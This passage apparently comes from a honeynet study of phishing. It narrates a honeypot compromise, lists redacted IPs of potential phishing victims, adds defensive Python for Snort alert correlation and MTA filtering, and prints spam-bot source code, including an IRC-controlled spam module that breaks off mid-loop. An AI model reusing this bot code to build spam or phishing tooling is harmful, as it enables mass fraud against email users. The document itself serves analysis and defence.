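The two alerts above are in Snort's full-alert format. As an added example (not part of the original analysis), the following Python parses records in that format into structured events and applies a simple correlation: repeated shellcode alerts from one source to one target port, followed by an alert in the reply direction, is the pattern the timeline describes for the retried exploit and the returned root shell. The sample records are constructed in the same shape as the alerts above (the attacker's address is left redacted as in the capture, and the reply-direction record uses the stock Snort rule 498); they are not the honeynet's alert log.

```python
import re
from datetime import datetime, timedelta

# Constructed sample in the shape of Snort full-alert records. The third
# record is the reply-direction alert (stock Snort rule 498) that fires when
# the target echoes "uid=0(root)" back to the attacker. Not the honeynet's log.
SAMPLE_ALERTS = """\
[**] [1:648:7] SHELLCODE x86 NOOP [**]
[Classification: Executable code was detected] [Priority: 1]
07/18-12:30:37.817422 69.44.XXX.XXX:47938 -> 10.2.2.120:139
TCP TTL:53 TOS:0x0 ID:29659 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0x476AC788 Ack: 0x2E249707 Win: 0xB68 TcpLen: 32
TCP Options (3) => NOP NOP TS: 214020820 6062617
[Xref => http://www.whitehats.com/info/IDS181]

[**] [1:648:7] SHELLCODE x86 NOOP [**]
[Classification: Executable code was detected] [Priority: 1]
07/18-12:30:41.102233 69.44.XXX.XXX:47941 -> 10.2.2.120:139
TCP TTL:53 TOS:0x0 ID:29702 IpLen:20 DgmLen:1500 DF
***AP*** Seq: 0x476AD000 Ack: 0x2E249900 Win: 0xB68 TcpLen: 32

[**] [1:498:6] ATTACK-RESPONSES id check returned root [**]
[Classification: Potentially Bad Traffic] [Priority: 2]
07/18-12:30:55.500000 10.2.2.120:139 -> 69.44.XXX.XXX:47941
TCP TTL:64 TOS:0x0 ID:1234 IpLen:20 DgmLen:100 DF
***AP*** Seq: 0x2E1F5FBE Ack: 0x47D426D5 Win: 0x16A0 TcpLen: 32
"""

HEADER_RE = re.compile(r"^\[\*\*\] \[(\d+):(\d+):(\d+)\] (.+?) \[\*\*\]$")
CLASS_RE = re.compile(r"^\[Classification: (.+?)\] \[Priority: (\d+)\]$")
# Octets may be redacted as "XXX" in published captures, so accept X as well as digits.
PKT_RE = re.compile(r"^(\d\d)/(\d\d)-(\d\d):(\d\d):(\d\d)\.(\d+) "
                    r"([\dX.]+):(\d+) -> ([\dX.]+):(\d+)$")


def parse_snort_alerts(text, year=2004):
    """Parse blank-line separated full-format alert records into dicts.
    Snort omits the year from the timestamp, so it is supplied by the caller."""
    events = []
    for block in re.split(r"\n\s*\n", text.strip()):
        lines = block.splitlines()
        h = HEADER_RE.match(lines[0])
        c = CLASS_RE.match(lines[1]) if len(lines) > 1 else None
        p = PKT_RE.match(lines[2]) if len(lines) > 2 else None
        if not (h and c and p):
            continue  # truncated or malformed record: skip rather than guess
        mo, d, hh, mi, ss = (int(p.group(i)) for i in range(1, 6))
        us = int(p.group(6)[:6].ljust(6, "0"))
        events.append({
            "gid": int(h.group(1)), "sid": int(h.group(2)), "rev": int(h.group(3)),
            "msg": h.group(4), "classification": c.group(1), "priority": int(c.group(2)),
            "time": datetime(year, mo, d, hh, mi, ss, us),
            "src": p.group(7), "sport": int(p.group(8)),
            "dst": p.group(9), "dport": int(p.group(10)),
            "proto": lines[3].split()[0] if len(lines) > 3 else None,
        })
    return events


def correlate_attempts(events, window=timedelta(seconds=60)):
    """Group alerts by (src, dst, dport) and note whether any alert in the
    reverse direction follows the last attempt within `window`. A reply-side
    alert after repeated shellcode alerts is the heuristic used here for
    "the exploit probably succeeded"; it is a triage hint, not proof."""
    by_flow = {}
    for e in sorted(events, key=lambda e: e["time"]):
        by_flow.setdefault((e["src"], e["dst"], e["dport"]), []).append(e)
    result = {}
    for (src, dst, dport), attempts in by_flow.items():
        last = attempts[-1]["time"]
        reverse = [e for e in events
                   if e["src"] == dst and e["dst"] == src
                   and last <= e["time"] <= last + window]
        result[(src, dst, dport)] = {
            "attempts": len(attempts),
            "first": attempts[0]["time"], "last": last,
            "sids": sorted({e["sid"] for e in attempts}),
            "response_seen": bool(reverse),
            "response_msgs": [e["msg"] for e in reverse],
        }
    return result
```

The correlation deliberately keys on destination port rather than source port: an attacker retrying an exploit with different offsets opens a new connection (and so a new source port) per attempt, as the two different source ports in the alerts above show.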
18/07/04 - 12:30. After gaining root access, the attacker checks who they are and who else is logged into the system before attempting to hide their activities by turning off shell history logging. The Sebek keystrokes for this session are shown below:
18/07/04 - 12:31. The attacker then proceeds to download what appears to be an image file from a remote web server using the wget command line HTTP client:
18/07/04 - 12:32. The attacker unpacks the image file, which is actually a gzipped tar archive, before extracting and running a setup program:
The attacker's view of this session can be found here. Analysis showed that the malware installed was the SHV4 root kit, previously the subject of the Honeynet Project's Scan of the Month challenge 29.
From the SHV4 root kit source code, we can determine what the setup command does:
The attacker has installed and configured an encrypted backdoor on the honeypot, bound to TCP port 2277. A large amount of other activity occurs on the system over the following 12-72 hours, including installation of PsyBNC IRC servers by a Romanian group, installation and usage of the mole and mazz mass scanners (probably the autorooter used to compromise this honeypot), installation and re-installation of other rootkits, password sniffing and various other activities not relevant to the main phishing attack.
23/07/04 - 21:11. The attacker returns from 192.226.XXX.XXX (a Windows 2000 or Windows XP PC in Ontario) via the SSH backdoor listening on TCP port 2277 and checks if the server is still active and who is logged in:
23/07/04 - 21:13. The attacker reconnects, prepares a directory in the Apache web server's document root and then downloads some pre-built web content from a Romanian web server, again using wget, before checking the honeypot's IP address and PHP configuration:
23/07/04 - 21:15. The attacker attempts to extract the contents of the zip file but finds it is corrupt and deletes it.
23/07/04 - 21:16. The attacker changes tools and gets another file using FTP, again from the same web server in Romania, which does extract successfully this time:
23/07/04 - 21:17. The attacker edits the extracted web content and updates the HTML to point to a testing PHP script on a remote web server:
23/07/04 - 21:22. The attacker checks the network configuration of the honeypot and version of PHP installed:
25/07/04 - 21:42. The attacker opens a second session, checks again if PHP is configured correctly on the honeypot and downloads a tool for sending spam email from the same Romanian web server:
25/07/04 - 22:08. The attacker checks an input list of email addresses and runs a PHP script to send spam email:
25/07/04 - 22:10. The attacker edits the content of the spam message, points it at a co-located Linux web server running an American student web site, and runs the PHP script to send spam email again:
The attacker's initial test at 22:08:52 works as planned, with 5 test messages being successfully sent (although due to the outbound traffic restrictions on the Honeywall, further mass mailing attempts would fail). However, after a 10 minute wait the attacker cleans up and leaves without sending any further messages from this honeypot.
In this side note we provide an overview of the source IP addresses of potential victims in the UK phishing attack against a major US bank described in phishing technique one. The data below was collected with the help of the compromised UK honeypot and network packet captures. Over a period of about 4 days we observed 265 inbound HTTP requests to the honeypot, presumably recipients of a spam phishing email who were tricked into accessing the redirected content by clicking on the link provided. All were potential victims of the phishing attack, but none actually submitted personal data and therefore the phishing attack was unsuccessful.
| IP | ISP | Country | OS |
| 4.138.NNN.NNN | Level 3 | US | Windows XP, 2000 SP2+ (NAT!) |
| 4.224.NNN.NNN | Level 3 | US | Windows 98 |
| 4.235.NNN.NNN | Level 3 | US | Windows XP, 2000 SP2+ (NAT!) |
| 4.239.NNN.NNN | Level 3 | US | Windows XP, 2000 SP2+ |
| 12.202.NNN.NNN | AT&T | US | FreeBSD 4.7 |
| 12.217.NNN.NNN | AT&T | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 12.218.NNN.NNN | AT&T | US | UNKNOWN |
| 24.16.NNN.NNN | Comcast Cable | US | Windows XP Pro SP1, 2000 SP3 |
| 24.58.NNN.NNN | Road Runner | US | Windows XP Pro SP1, 2000 SP3 |
| 24.59.NNN.NNN | Road Runner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 24.62.NNN.NNN | Comcast Cable | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 24.90.NNN.NNN | Road Runner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 24.93.NNN.NNN | Road Runner | US | Windows XP Pro SP1, 2000 SP3 |
| 24.107.NNN.NNN | Charter Comms | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 24.129.NNN.NNN | Comcast Cable | US | Windows XP Pro SP1, 2000 SP3 (NAT!) |
| 24.140.NNN.NNN | Massillon Cable | US | Windows XP, 2000 SP2+ |
| 24.154.NNN.NNN | Armstrong Cable | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 24.160.NNN.NNN | Road Runner | US | UNKNOWN |
| 24.161.NNN.NNN | Road Runner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 24.162.NNN.NNN | Road Runner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 24.163.NNN.NNN | Road Runner | US | Windows 2000 SP4, XP SP1 |
| 24.165.NNN.NNN | Road Runner | US | Windows XP Pro SP1, 2000 SP3 |
| 24.166.NNN.NNN | Road Runner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 24.208.NNN.NNN | Road Runner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 24.209.NNN.NNN | Road Runner | US | Windows XP Pro SP1, 2000 SP3 (firewall!) |
| 24.220.NNN.NNN | Midcontinent Comms | US | UNKNOWN |
| 24.231.NNN.NNN | Charter Comms | US | Windows XP SP1, 2000 SP3 |
| 24.239.NNN.NNN | Armstrong Cable | US | Windows XP/2000 |
| 24.243.NNN.NNN | Service Co LLC | US | Windows XP Pro SP1, 2000 SP3 |
| 63.165.NNN.NNN | DIGITEL | Prob US | OpenBSD 3.0 |
| 63.192.NNN.NNN | Pacific Bell | US | Windows 2000 SP4, XP SP1 |
| 64.12.NNN.NNN | AOL | US | Linux 2.4 w/o timestamps |
| 64.33.NNN.NNN | West Winconsin Telecomn | US | Windows XP, 2000 SP2+ |
| 64.58.NNN.NNN | Marlowe & Associates | US | Windows 98 (2) (NAT!) |
| 64.136.NNN.NNN | Juno Online | US | OpenBSD 3.0 |
| 64.136.NNN.NNN | Juno Online | US | OpenBSD 3.0 |
| 64.136.NNN.NNN | Juno Online | US | OpenBSD 3.0 |
| 64.161.NNN.NNN | Pacific Bell Internet | US | Windows XP Pro SP1, 2000 SP3 (NAT!) |
| 64.216.NNN.NNN | SBC Internet | US | Windows XP Pro SP1, 2000 SP3 (NAT!) |
| 64.222.NNN.NNN | Verizon Internet | US | Windows 2000 SP4, XP SP 1 |
| 65.78.NNN.NNN | RCN Corporation | US | FreeBSD 4.7 |
| 65.166.NNN.NNN | Sprint | US | Windows 98 |
| 65.204.NNN.NNN | Eagle Mountain Telecom | US | FreeBSD 4.8 |
| 65.221.NNN.NNN | Buckeye Cablevision | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 65.229.NNN.NNN | UUNET | US | Windows XP/2000 |
| 66.38.NNN.NNN | Brandenburg Telephone Company | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 66.41.NNN.NNN | Comcast Cable | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 66.45.NNN.NNN | WholeSecurity, Inc | US | Windows 2000 SP4, XP SP1 |
| 66.61.NNN.NNN | Road Runner | US | Windows XP Pro SP1, 2000 SP3 |
| 66.67.NNN.NNN | Road Runner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 66.68.NNN.NNN | Road Runner | US | Windows XP Pro SP1, 2000 SP3 |
| 66.82.NNN.NNN | Hughes Network Systems | US | UNKNOWN |
| 66.170.NNN.NNN | T-NET, Inc | US | Windows XP, 2000 SP2+ |
| 66.188.NNN.NNN | Charter Comms | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) (firewall!) |
| 67.5.NNN.NNN | Qwest | US | Windows XP, 2000 SP2+ |
| 67.23.NNN.NNN | Adelphia Cable Comms | US | Windows XP Pro SP1, 2000 SP3 |
| 67.38.NNN.NNN | Ameritech Electronic Commerce | US | Windows XP, 2000 SP2+ |
| 67.66.NNN.NNN | SBC Internet Services | US | Windows XP SP1, 2000 SP3 |
| 67.122.NNN.NNN | Pac Bell Internet | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 67.160.NNN.NNN | Comcast Cable | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 67.164.NNN.NNN | Comcast Cable | US | Windows XP Pro SP1, 2000 SP3 (NAT!) |
| 67.167.NNN.NNN | Comcast Cable | US | UNKNOWN |
| 68.10.NNN.NNN | Cox Communications Inc | US | Windows XP Pro SP1, 2000 SP3 |
| 68.14.NNN.NNN | Cox Communications Inc | US | FreeBSD 4.7 |
| 68.32.NNN.NNN | Comcast Cable | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 68.53.NNN.NNN | Comcast Cable | US | Windows XP Pro SP1, 2000 SP3 |
| 68.88.NNN.NNN | SBC Internet Services | US | Windows 2000 SP4, XP SP 1 |
| 68.89.NNN.NNN | SBC Internet Services | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 68.94.NNN.NNN | SBC Internet Services | US | Windows XP Pro SP1, 2000 SP3 (NAT!) |
| 68.103.NNN.NNN | Cox Communications Inc | US | Windows XP Pro SP1, 2000 SP3 |
| 68.109.NNN.NNN | Cox Communications Inc | US | Windows 2000 SP4, XP SP1 |
| 68.205.NNN.NNN | Road Runner | US | UNKNOWN |
| 68.254.NNN.NNN | SBC Internet Services | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 69.23.NNN.NNN | - | - | Windows XP Pro SP1, 2000 SP3 |
| 69.48.NNN.NNN | Choice One Comms | US | Windows XP, 2000 SP2+ |
| 69.59.NNN.NNN | Peak Inc | US | Windows XP/2000 via Cisco |
| 69.132.NNN.NNN | Road Runner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 69.133.NNN.NNN | Road Runner | US | Windows XP Pro SP1, 2000 SP3 |
| 69.134.NNN.NNN | Road Runner | US | UNKNOWN |
| 69.135.NNN.NNN | Road Runner | US | Windows 2000 SP4, XP SP1 |
| 69.135.NNN.NNN | Road Runner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 69.151.NNN.NNN | SBC Internet Services | US | Windows XP Pro SP1, 2000 SP3 (NAT!) |
| 69.162.NNN.NNN | Adelphia Cable Comms | US | FreeBSD 4.7 |
| 137.229.NNN.NNN | University of Alaska | US | Windows XP Pro SP1, 2000 SP3 |
| 141.154.NNN.NNN | Verizon Internet | US | Windows XP SP1, 2000 SP3 |
| 148.78.NNN.NNN | Starband Comms | US | CacheFlow CacheOS 4.1 (up |
| 149.174.NNN.NNN | CompuServe | US | Linux 2.4 w/o timestamps |
| 152.163.NNN.NNN | AOL | US | Linux 2.4 w/o timestamps |
| 156.36.NNN.NNN | US Bancorp | US | OpenBSD 3.0 |
| 162.83.NNN.NNN | Verizon Internet | US | Windows 2000 SP4, XP SP1 |
| 166.102.NNN.NNN | WRK Internet | - | Windows XP, 2000 SP2+ |
| 166.102.NNN.NNN | WRK Internet | - | Windows XP, 2000 SP2+ |
| 169.207.NNN.NNN | Executive PC, Inc | US | Windows 98 |
| 170.94.NNN.NNN | State of Arkansas | US | Windows 2000 SP4, XP SP1 |
| 172.131.NNN.NNN | AOL | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 172.131.NNN.NNN | AOL | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 204.95.NNN.NNN | Sprint | US | Windows XP, 2000 SP2+ |
| 204.210.NNN.NNN | Road Runner | US | Windows 2000 SP4, XP SP1 |
| 204.210.NNN.NNN | Road Runner | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 205.162.NNN.NNN | Buckeye Cablevision | US | Windows 2000 SP2+, XP SP1 (seldom 98 4.10.2222) |
| 206.148.NNN.NNN | AGIS | US | Windows XP, 2000 SP2+ |
| 206.196.NNN.NNN | US West Internet Services | US | Windows XP Pro SP1, 2000 SP3 |
| 207.89.NNN.NNN | NetLink Systems LLC | US | Windows XP, 2000 SP2+ |
| 207.89.NNN.NNN | NetLink Systems LLC | US | Linux 2.4/2.6 (up |
| 207.231.NNN.NNN | Surewest Internet | US | BSD/OS 3.1 |
| 208.60.NNN.NNN | Local Link | US | Windows XP, 2000 SP2+ |
| 208.187.NNN.NNN | Lanset Comms | US | Windows XP, 2000 SP2+ |
| 208.191.NNN.NNN | SBC Internet | US | Windows XP Pro SP1, 2000 SP3 (NAT!) |
| 209.43.NNN.NNN | IQuest Internet | US | Windows XP, 2000 SP2+ |
| 209.131.NNN.NNN | CenturyTel Internet Holdings Inc | US | Windows 98 |
| 209.206.NNN.NNN | IQuest Internet | US | Windows XP, 2000 SP2+ |
| 209.247.NNN.NNN | Bend Cable | US | Linux 2.4/2.6 (up |
| 216.93.NNN.NNN | Voyager Information Networks | US | Windows XP, 2000 SP2+ |
| 216.228.NNN.NNN | Bend Cable | US | Cisco Content Engine |
In this side note we will review the source code of some bots captured during our research and show several examples of how bots are being used to send out spam and phishing emails.
strcpy(server,a[s+1]);
port = atoi(a[s+2]);
strcpy(sender_email,a[s+3]);
strcpy(recp_email,a[s+4]);
strcpy(subject,replacestr(a[s+5],"_"," "));
fWSAStartup(version, &wsaData);
LPHOSTENT lpHostEntry;
lpHostEntry = fgethostbyname(server);
SOCKET MailSocket;
MailSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
SOCKADDR_IN saServer;
saServer.sin_family = AF_INET;
saServer.sin_addr = *((LPIN_ADDR)*lpHostEntry->h_addr_list);
saServer.sin_port = fhtons((unsigned short)port);
sprintf(BigBuf,"helo $rndnick\nmail from: <%s>\nrcpt to: <%s>\ndata\nsubject: %s\nfrom: %s\n%s\n.\n",sender_email,recp_email,subject,sender_email,subject);
nRet = fconnect(MailSocket, (LPSOCKADDR)&saServer, sizeof(saServer));
nRet = frecv(MailSocket, myBuf, sizeof(myBuf), 0);
nRet = fsend(MailSocket, BigBuf, strlen(myBuf), 0);
nRet = frecv(MailSocket, myBuf, sizeof(myBuf), 0);
fclosesocket(MailSocket);
fWSACleanup();
sprintf(sendbuf, "[EMAIL]: Message sent to %s.",recp_email);
if (!silent) irc_privmsg(sock, a[2], sendbuf, notice);
addlog(sendbuf);
return repeat;
}
[...]
int sAOLSock=DoTcpConnect(szDNS, 25); if(sAOLSock==SOCKET_ERROR) return false;
int iCount=0; char szBuf[4096]; while(recv_line(sAOLSock, szBuf, sizeof(szBuf))) {
if(strstr(szBuf, "220-") && strstr(szBuf, "ESMTP")) break;
if(strstr(szBuf, "postmaster.info.aol.com")) iIsMsg_Matched+=25;
if(strstr(szBuf, "554-") && iCount==1) iIsMsg_Matched+=20;
if(strstr(szBuf, "(RTR:DU)")) iIsMsg_Matched+=10;
if(strstr(szBuf, "not accept")) iIsMsg_Matched+=10;
if(strstr(szBuf, "dynamic")) iIsMsg_Matched+=5;
if(strstr(szBuf, "residential")) iIsMsg_Matched+=5;
if(strstr(szBuf, "are using to")) iIsMsg_Matched+=5;
iCount++; }
if(iCount==5) iIsMsg_Matched+=10;
xWrite(sAOLSock, "QUIT\n", sizeof("QUIT\n"));
bool bRetVal=false;
if(iIsMsg_Matched <= 5) bRetVal=true;
xClose(sAOLSock);
return bRetVal;
}
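Both bot fragments above, the send routine that writes the whole SMTP dialogue into one buffer and the probe that scores a mail server's greeting to decide whether the bot's IP is worth spamming from, can be replayed without a network. The following Python is an added example, not code from either bot: it models a receiving MTA's greeting and HELO policy on one side and reproduces the probe's scoring on the other. The reverse-DNS patterns, host names and reply wording are assumptions chosen to exercise the scoring; the weights and phrases are the ones in the captured probe.

```python
import re

# Added example. The rDNS patterns, host names and reply wording below are
# assumptions for illustration; the probe weights are those in the captured bot.
DYNAMIC_RDNS = re.compile(r"(dyn|dynamic|dsl|cable|pool|ppp|dial)", re.I)
FQDN_RE = re.compile(r"^[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$")


def mta_greeting(client_rdns: str, mx_name: str = "mx.example.net") -> list:
    """Greeting lines a receiving MTA might send. Hosts whose reverse DNS
    looks like dynamic/residential space get a multi-line 554 and are
    disconnected; everyone else gets a normal 220 banner."""
    if client_rdns and DYNAMIC_RDNS.search(client_rdns):
        return [
            f"554-{mx_name} (RTR:DU) The IP address you are using to connect",
            "554-is dynamic or residential space and this server does not accept",
            "554-mail from it directly. Send through your provider's relay.",
            "554 Connection refused",
        ]
    return [f"220-{mx_name} ESMTP ready", "220 Go ahead"]


def mta_helo_reply(helo_arg: str, mx_name: str = "mx.example.net") -> str:
    """Reply to HELO. A bare label such as the bot's random IRC nick is
    rejected; requiring an FQDN here is an assumed policy, not any one
    product's behaviour."""
    if FQDN_RE.match(helo_arg):
        return f"250 {mx_name} Hello {helo_arg}"
    return "501 5.5.4 HELO requires a fully qualified domain name"


def bot_probe_score(lines: list) -> int:
    """The greeting-scoring logic from the captured bot, line for line:
    each matched phrase adds weight, a "220-" line containing ESMTP stops the
    scan, and a greeting of exactly five lines adds a bonus."""
    score, count = 0, 0
    for line in lines:
        if "220-" in line and "ESMTP" in line:
            break
        if "postmaster.info.aol.com" in line:
            score += 25
        if "554-" in line and count == 1:
            score += 20
        if "(RTR:DU)" in line:
            score += 10
        if "not accept" in line:
            score += 10
        if "dynamic" in line:
            score += 5
        if "residential" in line:
            score += 5
        if "are using to" in line:
            score += 5
        count += 1
    if count == 5:
        score += 10
    return score


def bot_would_use_host(lines: list) -> bool:
    """The bot treats a score of 5 or less as "this IP is not blocked"."""
    return bot_probe_score(lines) <= 5


def bot_envelope(rnd_nick: str, sender: str, recipient: str, subject: str) -> str:
    """The command sequence the captured send routine writes in one buffer:
    HELO with a random nick rather than an FQDN, no blank line between the
    headers and the body, and the subject reused as the body text."""
    return (f"helo {rnd_nick}\nmail from: <{sender}>\nrcpt to: <{recipient}>\n"
            f"data\nsubject: {subject}\nfrom: {sender}\n{subject}\n.\n")
```

Two things follow from replaying the exchange. A bot connecting from consumer address space is turned away before it sends a single command, so reverse-DNS policy at the MTA removes the whole class of direct-to-MX sending shown in the first fragment; and even where a host is accepted, the malformed HELO the bot sends is a reliable rejection point, because the bot never parses the reply and cannot adapt.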
This is private software, you may redistribute it under the terms of
the APL(Ago's Private License) which follows:
Redistribution and use in binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. The name of the author may not be used to endorse or promote products
derived from this software without specific prior written permission.
2. The binary may not be sold and/or given away for free.
3. The licensee may only create binaries for his own usage, not for any
third parties.
Redistribution and use in source forms, with or without modification,
are not permitted.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */
#include "main.h"
#include "mainctrl.h"
#include "smtp_logic.h"
#include "smtp.h"
CSMTP_Logic::CSMTP_Logic() {
m_szType="CSMTP_Logic";
m_lEmails.clear(); m_sEmailTemplate.Assign(""); m_bSpamming=false; m_bTemplateSet=false;
}
CSMTP_Logic::~CSMTP_Logic() {
m_lEmails.clear(); m_sEmailTemplate.Assign(""); m_bSpamming=false; m_bTemplateSet=false;
}
void CSMTP_Logic::Init() {
REGCMD(m_cmdSetList, "spam.setlist", "downloads an email list", false, this);
REGCMD(m_cmdSetTemplate, "spam.settemplate", "downloads an email template", false, this);
REGCMD(m_cmdStart, "spam.start", "starts the spamming", false, this);
REGCMD(m_cmdStop, "spam.stop", "stops the spamming", false, this);
REGCVAR(spam_maxthreads, "8", "Spam Logic - Number of threads", false, 0);
REGCVAR(spam_htmlemail, "true", "Spam Logic - Send HTML emails", false, 0);
}
bool CSMTP_Logic::HandleCommand(CMessage *pMsg) {
if(!pMsg->sCmd.Compare("spam.setlist")) {
m_sListURL.Assign(pMsg->sChatString.Token(1, " "));
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Downloading new email list.", pMsg->sReplyTo.Str());
SetList(m_sListURL);
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Finished downloading new email list.", pMsg->sReplyTo.Str());
return true;
}
else if(!pMsg->sCmd.Compare("spam.settemplate")) {
m_sTemplateURL.Assign(pMsg->sChatString.Token(1, " "));
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Downloading new email template.", pMsg->sReplyTo.Str());
SetTemplate(m_sTemplateURL);
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Finished downloading new email template.", pMsg->sReplyTo.Str());
return true;
}
else if(!pMsg->sCmd.Compare("spam.start")) {
m_bSpamming=true;
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Started spamming.", pMsg->sReplyTo.Str());
return true;
}
else if(!pMsg->sCmd.Compare("spam.stop")) {
m_bSpamming=false;
g_pMainCtrl->m_cIRC.SendMsg(pMsg->bSilent, pMsg->bNotice, \
"Stopped spamming.", pMsg->sReplyTo.Str());
return true; }
return false;
}
void CSMTP_Logic::SetList(CString &sURL) {
try {
url uURL;
CDownloadHelper *pDldHlp=new CDownloadHelper;
if(!ParseURL(sURL, &uURL)) return;
pDldHlp->m_sHost.Assign(uURL.sHost); pDldHlp->m_sPath.Assign(uURL.sReq);
pDldHlp->m_sTarget.Assign("list.tmp"); pDldHlp->m_sReplyTo.Assign("");
pDldHlp->m_bExecute=false; pDldHlp->m_bUpdate=false; pDldHlp->m_bFTP=false;
pDldHlp->m_bSilent=true; pDldHlp->m_bNotice=false; pDldHlp->m_bJoin=false;
pDldHlp->Run(); delete pDldHlp;
FILE *fp=fopen("list.tmp", "rb");
if(!fp) return;
int iFileSize=GetFileSize(fp);
char *szList=new char[iFileSize+1];
memset(szList, 0, iFileSize+1);
fread(szList, sizeof(char), iFileSize, fp);
CString sList(szList); char *szListCopy=sList.Str(), *szTemp;
while(true) {
char *szCRLF=strstr(szListCopy, "\r");
if(!szCRLF) szCRLF=strstr(szListCopy, "\n");
if(!szCRLF) break;
while(*szCRLF=='\r') { *szCRLF='\0'; szCRLF++; }
while(*szCRLF=='\n') { *szCRLF='\0'; szCRLF++; }
while(*szCRLF=='\r') { *szCRLF='\0'; szCRLF++; }
char *szToken=szListCopy; szListCopy=szCRLF;
if(!strcmp(szToken, "")) continue;
m_lEmails.push_back(CString(szToken)); }
delete [] szList; fclose(fp);
DeleteFile("list.tmp");
#ifdef PtW32CatchAll
} PtW32CatchAll {
#else
} catch(...) {
#endif
// Bla
}
}
void CSMTP_Logic::SetTemplate(CString &sURL) {
try {
url uURL;
CDownloadHelper *pDldHlp=new CDownloadHelper;
if(!ParseURL(sURL, &uURL)) return;
pDldHlp->m_sHost.Assign(uURL.sHost); pDldHlp->m_sPath.Assign(uURL.sReq);
pDldHlp->m_sTarget.Assign("template.tmp"); pDldHlp->m_sReplyTo.Assign("");
pDldHlp->m_bExecute=false; pDldHlp->m_bUpdate=false; pDldHlp->m_bFTP=false;
pDldHlp->m_bSilent=true; pDldHlp->m_bNotice=false; pDldHlp->m_bJoin=false;
pDldHlp->Run(); delete pDldHlp;
FILE *fp=fopen("template.tmp", "rb");
if(!fp) return;
int iFileSize=GetFileSize(fp);
char *szTemplate=new char[iFileSize+1];
memset(szTemplate, 0, iFileSize+1);
// Header block: one "key value" line per field (from, from_full, subject);
// the first line that begins with "data" ends it, everything after it is the body
while(!feof(fp)) {
fgets(szTemplate, iFileSize, fp);
CString sTemplate(szTemplate);
if(sTemplate.Find('\r', 0)) {
sTemplate[sTemplate.Find('\r', 0)-1]='\0';
}
if(sTemplate.Find('\n', 0)) {
sTemplate[sTemplate.Find('\n', 0)-1]='\0';
}
if(!sTemplate.Mid(0, 4).Compare("data")) break;
if(!sTemplate.Token(0, " ").Compare("from")) {
m_sEmailSrc.Assign(sTemplate.Token(1, " ", true));
}
if(!sTemplate.Token(0, " ").Compare("from_full")) {
m_sEmailSrcFull.Assign(sTemplate.Token(1, " ", true));
}
if(!sTemplate.Token(0, " ").Compare("subject")) {
m_sSubject.Assign(sTemplate.Token(1, " ", true));
}
}
CString sDataTmp("");
while(!feof(fp)) {
fgets(szTemplate, iFileSize, fp);
CString sTemplate(szTemplate);
if(sTemplate.Find('\r', 0)) {
sTemplate[sTemplate.Find('\r', 0)-1]='\0';
}
if(sTemplate.Find('\n', 0)) {
sTemplate[sTemplate.Find('\n', 0)-1]='\0';
}
sDataTmp.Append(sTemplate); sDataTmp.Append("\r\n");
}
m_sData.Assign(sDataTmp);
m_sEmailTemplate.Assign("");
delete [] szTemplate; fclose(fp);
DeleteFile("template.tmp");
m_bTemplateSet=true;
#ifdef PtW32CatchAll
} PtW32CatchAll {
#else
} catch(...) {
#endif
// Bla
}
}
void *CSMTP_Logic::Run() {
return NULL; // unconditional early return: the spam loop below is unreachable as written
while(true) {
try {
int iNumThreads=spam_maxthreads.iValue;
CSMTP_Sender *pSenders=new CSMTP_Sender[iNumThreads];
// Spam loop
